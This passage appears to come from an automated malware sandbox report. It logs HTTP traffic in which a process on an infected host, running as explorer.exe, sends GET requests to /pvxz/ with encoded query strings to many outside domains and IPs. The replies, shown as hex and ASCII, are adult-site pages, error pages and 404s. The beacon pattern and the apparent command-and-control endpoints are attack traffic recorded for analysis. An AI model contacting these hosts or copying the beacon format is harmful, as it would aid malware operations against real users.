83 85 e4 b8 bb e6 92 ad 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 bc 98 e6 92 ad 41 56 2d 43 4e 32 32 2d e5 9b bd e4 ba a7 41 56 e5 a4 a7 e5 85 a8 2c e9 ab 98 e6 b8 85 61 76 e5 bd b1 e8 a7 86 2c e4 b9 85 e4 b9 85 e5 9b bd e4 ba a7 e7 b2 be e5 93 81 e4 b8 ad e6 96 87 e5 ad 97 e5 b9 95 e6 89 8b e6 9c ba e7 89 88 2c e4 b8 ad e6 96 87 e5 ad 97 e5 b9 95 e4 ba 9a e6 b4 b2 e6 97 a0 e7 ba bf e7 a0 81 e4 b8 80 e5 8c ba 2c e5 9b bd e4 ba a7 e6 ac a7 e7 be 8e e5 9b bd e6 97 a5 e4 ba a7 2c e5 9b bd e4 ba a7 20 e6 97 a5 e9 9f a9 20 e6 ac a7 e7 be 8e 20 e9 ab 98 e6 b8 85 20 e4 ba 9a e6 b4 b2 2c e5 8f af e4 bb a5 e7 9b b4 e6 8e a5 e8 a7 82 e7 9c 8b e7 9a 84 61 76 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b 23 2c e9 aa 9a e6 b0 94 e5 a6 b9 e5 ad 90 e5 8b be e5 bc 95 e7 90 86 e5 8f 91 e5 ba 97 2c e5 b0 8f e5 a7 90 e8 bd ac e8 a1 8c e5 bd 93 e8 89 b2 e6 83 85 e4 b8 bb e6 92 ad 2c e5 9b bd e4 ba a7 e7 b2 be e5 93 81 e4 b8 93 e5 8c ba e7 ac ac 31 e9 a1 b5 e6 9c 80 e6 96 b0 e7 ab a0 e8 8a 82 2c e6 ac a7 e7 be 8e e8 80 81 e7 86 9f e5 a6 87 e5 96 b7 e6 b0 b4 e5 89 a7 e6 83 85 e7 ae 80 e4 bb 8b 2c e4 bf ba e4 b9 9f e6 9d a5 e4 bf ba e4 b9 9f e5 8e bb e4 bf ba e4 b9 9f e5 b0 84 e6 89 8b e6 9c ba e7 89 88 2c e6 ac a7 e7 be 8e e6 97 a5 e9 9f a9 e5 9b bd e4 ba a7 e5 85 8d e8 b4 b9 e4 b8 80 e5 8c ba 2c e8 8f a0 e8 90 9d e8 9c 9c e9 ab 98 e6 b8 85 e5 ae 8c e6 95 b4 e8 a7 86 e9 a2 91 e5 9c a8 e7 ba bf e6 92 ad e6 94 be 2c e9 b2 81 e9 b2 81 e9 bb 84 e7 93 9c e5 bd b1 e9 99 a2 e6 b1 a1 e5 85 8d e8 b4 b9 2c e7 ab 8b e8 8a b1 e9 87 8c e5 ad 90 e8 a7 86 e9 a2 91 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b 2c e6 9a 96 e6 9a 96 e8 a7 86 e9 Data Ascii: 1ffc8<!DOCTYPE html><html><html><head> <title>BD-AV</title> <meta name="keywords" content="av,,,, ,av#,,,,,,"> <meta name="description" content="AV-CN22-AV,av,,,, ,av#,,,1,,,,,,,
Dec 1, 2021 16:26:00.505429029 CET	8659	IN	Data Raw: a2 91 e6 97 a5 e6 9c ac e5 85 8d e8 b4 b9 e8 a7 82 e7 9c 8b e8 a7 86 e9 a2 91 2c e4 b9 85 e4 b9 85 e6 bf 80 e6 83 85 e7 bb bc e5 90 88 e7 94 b5 e5 bd b1 e7 bd 91 2c e8 9d 8c e8 9a aa e7 aa 9d e6 97 a5 e6 97 a5 e6 a9 be e4 ba ba e4 ba ba e7 a2 b0 Data Ascii: ,,,renren"> <meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1
Dec 1, 2021 16:26:00.799170971 CET	8661	IN	Data Raw: 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 74 69 74 6c 65 22 3e e4 b8 ad e6 96 87 e5 ad 97 e5 b9 95 e4 ba 9a e6 b4 b2 e6 97 a0 e7 ba bf e7 a0 81 e4 b8 80 e5 8c ba 2c e5 9b bd e4 ba a7 e6 ac a7 e7 be 8e e5 9b Data Ascii: <a href="/" class="header-title">,, ,av#</a> </h1> <div class="search-wrap" style="margin-top: -1.5px; d
Dec 1, 2021 16:26:00.799202919 CET	8662	IN	Data Raw: 61 20 63 6c 61 73 73 3d 22 63 61 74 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 2f 31 4d 34 49 78 73 2e 68 74 6d 6c 22 3e e7 be a4 e4 ba a4 e6 b7 ab e4 b9 b1 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: a class="cat-item" href="/1M4Ixs.html"></a> <a class="cat-item" href="/uU03gQ.html"></a> <a class="cat-item" href="/EN6qi5.html"></a>
Dec 1, 2021 16:26:00.922574997 CET	8663	IN	Data Raw: 30 34 2e 32 33 33 2e 31 37 36 2e 31 39 37 2f 67 67 2f 31 2e 68 74 6d 6c 22 3e e6 be b3 e9 97 a8 e6 80 bb e7 ab 99 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 63 61 74 2d Data Ascii: 04.233.176.197/gg/1.html"></a> <a class="cat-item" href="http://104.233.176.197/gg/2.html"></a> <a class="cat-item" href="http://104.233.176.197/gg/3.html"><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49840	198.54.117.217	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:05.747251034 CET	8664	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=GCiqwE+AocZAO2KzorVbe+5cAVR/sER9WTQIWH8MGwbYJAiKk6D+HvwNUH0eDnTOzOM/ HTTP/1.1 Host: www.piiqrio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49841	86.105.245.69	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:16.046744108 CET	8665	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=vQJfxOtI611W+RxH9ddEKx+uNoigK/zmKccwwKjwQCCnv7782yRErdaxoTFecp96gNUO HTTP/1.1 Host: www.neema.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:26:16.108149052 CET	8665	IN	HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 01 Dec 2021 15:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hpaghre5t8br9tmnkit5m23ut3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: / Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49842	66.235.200.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:21.440028906 CET	8666	OUT	GET /pvxz/?e0DDHLix=bCINk7waO+AAweJQetcshs4EXJImwvjnAC5D+DXKCvfhq7NWzMtc9ZOrSobl6zpZIFRB&_FN4W=CV_PbjYpbVj HTTP/1.1 Host: www.cis136-tgarza.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49843	156.235.157.134	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:27.398004055 CET	8667	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=lWYs4BNKo2NyazceVzv2HGKqsI/0suNqMdeNhVGKV3g2YeuVsAaP6gNudbn3yhvqV62w HTTP/1.1 Host: www.meishangtianhua.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:26:27.590044975 CET	8668	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 15:26:27 GMT Content-Length: 1705 Content-Type: text/html Server: nginx Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c1 c9 d4 b4 da c1 c2 b0 bc af cd c5 d3 d0 cf de d4 f0 c8 ce b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 32 31 34 37 38 3b 26 23 33 31 38 36 37 3b 26 23 39 34 35 3b 26 23 31 31 38 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 32 31 34 37 38 3b 26 23 33 31 38 36 37 3b 26 23 39 37 3b 26 23 38 35 36 34 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 32 39 37 31 3b 26 23 33 35 37 35 33 3b 26 23 32 32 37 36 36 3b 26 23 33 30 30 30 37 3b 26 23 32 34 33 32 34 3b 26 23 33 30 33 34 30 3b 26 23 32 37 39 36 39 3b 26 23 33 30 33 33 33 3b 26 23 32 37 39 37 34 3b 2c 26 23 32 36 33 36 38 3b 26 23 32 39 32 37 35 3b 26 23 32 32 38 39 39 3b 26 23 32 31 33 39 37 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 26 23 32 37 34 39 31 3b 26 23 33 38 37 35 34 3b 26 23 32 36 34 39 37 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 37 30 36 30 3b 26 23 33 33 37 31 34 3b 26 23 39 37 3b 26 23 31 31 32 3b 26 23 31 31 32 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 39 32 35 36 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 32 31 34 37 38 3b 26 23 33 31 38 36 37 3b 26 23 39 34 35 3b 26 23 31 31 38 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 32 31 34 37 38 3b 26 23 33 31 38 36 37 3b 26 23 39 37 3b 26 23 38 35 36 34 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 32 39 37 31 3b 26 23 33 35 37 35 33 3b 26 23 32 32 37 36 36 3b 26 23 33 30 30 30 37 3b 26 23 32 34 33 32 34 3b 26 23 33 30 33 34 30 3b 26 23 32 37 39 36 39 3b 26 23 33 30 33 33 33 3b 26 23 32 37 39 37 34 3b 2c 26 23 32 36 33 36 38 3b 26 23 32 39 32 37 35 3b 26 23 32 32 38 39 39 3b 26 23 32 31 33 39 37 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 26 23 32 37 34 39 31 3b 26 23 33 38 37 35 34 3b 26 23 32 36 34 39 37 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 37 30 36 30 3b 26 23 33 33 37 31 34 3b 26 23 39 37 3b 26 23 31 31 32 3b 26 23 31 31 32 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 39 32 35 36 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 32 31 34 37 38 3b 26 23 33 31 38 36 37 3b 26 23 39 34 35 3b 26 23 31 31 38 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 32 31 34 37 38 3b 26 23 33 31 38 36 37 3b 26 23 39 37 3b 26 23 38 35 36 34 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 32 39 37 31 3b 26 23 33 35 37 35 33 3b 26 23 32 32 37 36 36 3b 26 23 33 30 30 30 37 3b 26 23 32 34 33 32 34 3b 26 23 33 30 33 34 30 3b 26 23 32 37 39 36 39 3b 26 23 33 30 33 33 33 3b 26 23 32 37 39 37 34 3b 2c 26 23 32 36 33 36 38 3b 26 23 32 39 32 37 35 3b 26 23 32 32 38 39 39 3b 26 23 32 31 33 39 37 3b 26 23 32 30 35 39 39 3b 26 23 32 35 32 39 33 3b 26 23 32 37 34 39 31 3b 26 23 33 38 37 35 34 3b 26 23 32 36 34 39 37 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 37 30 36 30 3b 26 23 33 33 37 31 34 3b 26 23 39 37 3b 26 23 31 31 32 3b 26 23 31 31 32 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 39 32 35 36 3b 2c 26 23 33 34 35 38 38 3b 26 23 33 33 34 36 39 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#26085;&#26412;&#21478;&#31867;&#945;&#118;&#27431;&#32654;&#21478;&#31867;&#97;&#8564;,&#23047;&#22971;&#35753;&#22766;&#30007;&#24324;&#30340;&#27969;&#30333;&#27974;,&#26368;&#29275;&#22899;&#21397;&#20599;&#25293;&#27491;&#38754;&#26497;&#21697;,&#27060;&#33714;&#97;&#112;&#112;&#20813;&#36153;&#19979;&#36733;&#29256;</title><meta name="keywords" content="&#26085;&#26412;&#21478;&#31867;&#945;&#118;&#27431;&#32654;&#21478;&#31867;&#97;&#8564;,&#23047;&#22971;&#35753;&#22766;&#30007;&#24324;&#30340;&#27969;&#30333;&#27974;,&#26368;&#29275;&#22899;&#21397;&#20599;&#25293;&#27491;&#38754;&#26497;&#21697;,&#27060;&#33714;&#97;&#112;&#112;&#20813;&#36153;&#19979;&#36733;&#29256;" /><meta name="description" content="&#26085;&#26412;&#21478;&#31867;&#945;&#118;&#27431;&#32654;&#21478;&#31867;&#97;&#8564;,&#23047;&#22971;&#35753;&#22766;&#30007;&#24324;&#30340;&#27969;&#30333;&#27974;,&#26368;&#29275;&#22899;&#21397;&#20599;&#25293;&#27491;&#38754;&#26497;&#21697;,&#27060;&#33714;&#97;&#112;&#112;&#20813;&#36153;&#19979;&#36733;&#29256;,&#34588;&#33469;&#20122;&#27954;&#97;&#118;&#
Dec 1, 2021 16:26:27.590081930 CET	8669	IN	Data Raw: 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 33 33 39 34 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 30 38 31 3b 26 23 32 Data Ascii: 26080;&#30721;&#31934;&#21697;&#33394;&#21320;&#22812;,&#22269;&#20135;&#20081;&#23376;&#20262;&#39640;&#28165;&#38706;&#33080;&#23545;&#30333;," /><meta http-equi

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49845	197.248.5.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:32.977440119 CET	8676	OUT	GET /pvxz/?e0DDHLix=Czkl40VpJiNRQJS5lWJnKFxHKlnZ6CRMuI4G/gd+YABSgkcyWt+GOUfbjiYokSpGPyAa&_FN4W=CV_PbjYpbVj HTTP/1.1 Host: www.finetipster.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:26:33.168168068 CET	8677	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache Pragma: no-cache Expires: 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 4f 4e 54 45 4e 54 2d 54 59 50 45 22 20 43 4f 4e 54 45 4e 54 3d 22 54 45 58 54 2f 48 54 4d 4c 3b 20 43 48 41 52 53 45 54 3d 75 74 66 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 48 32 3e 45 72 72 6f 72 3c 2f 48 32 3e 3c 74 61 62 6c 65 20 73 75 6d 6d 61 72 79 3d 22 45 72 72 6f 72 22 20 62 6f 72 64 65 72 3d 22 30 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 39 39 33 33 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 30 30 22 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 20 73 75 6d 6d 61 72 79 3d 22 45 72 72 6f 72 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 33 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 31 22 3e 3c 74 72 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 39 39 33 33 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e 3c 74 64 3e 3c 53 54 52 4f 4e 47 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 54 68 69 73 20 69 73 20 6e 6f 74 20 74 68 65 20 77 65 62 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 66 6f 6e 74 3e 3c 2f 53 54 52 4f 4e 47 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 3e 3c 74 64 3e 54 68 69 73 20 70 61 67 65 20 63 61 6e 27 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 75 73 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 55 52 4c 20 61 64 64 72 65 73 73 20 74 6f 20 61 63 63 65 73 73 3c 62 72 2f 3e 54 68 65 20 69 6e 63 69 64 65 6e 74 20 49 44 20 69 73 3a 4e 2f 41 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="TEXT/HTML; CHARSET=utf-8"/><title>Error</title></head><body><H2>Error</H2><table summary="Error" border="0" bgcolor="#009933" cellpadding="0" cellspacing="0" width="400"><tr><td><table summary="Error" border="0" cellpadding="3" cellspacing="1"><tr valign="top" bgcolor="#009933" align="left"><td><STRONG><font color="white">This is not the web page you are looking for.</font></STRONG></td></tr><tr valign="top" bgcolor="#FFFFFF"><td>This page can't be displayed. Please use the correct URL address to access<br/>The incident ID is:N/A.</td></tr></table></td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49846	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:50.583769083 CET	8678	OUT	GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&8pqLWR=BzrlN6PpwXh HTTP/1.1 Host: www.sa-pontianak.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:26:50.619972944 CET	8679	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Dec 2021 15:26:50 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49847	15.197.142.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:55.689368963 CET	8680	OUT	GET /pvxz/?e0DDHLix=AMbF+Q/e/AO7yIAHRf5aUfsWvc/33vy+f/8PmVMiF5qZYbHgDNTXzprpLW2ZF4YvRkgO&8pqLWR=BzrlN6PpwXh HTTP/1.1 Host: www.localproperty.team Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:26:55.888065100 CET	8680	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Wed, 01 Dec 2021 15:26:55 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49848	156.67.222.132	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:27:07.094609022 CET	8681	OUT	GET /pvxz/?e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv&8pqLWR=BzrlN6PpwXh HTTP/1.1 Host: www.tourbox.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:27:07.285655975 CET	8682	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Tue, 25 Jun 2019 07:07:19 GMT etag: "999-5d11c827-698982c0c6efc961;;;" accept-ranges: bytes content-length: 2457 date: Wed, 01 Dec 2021 15:27:07 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 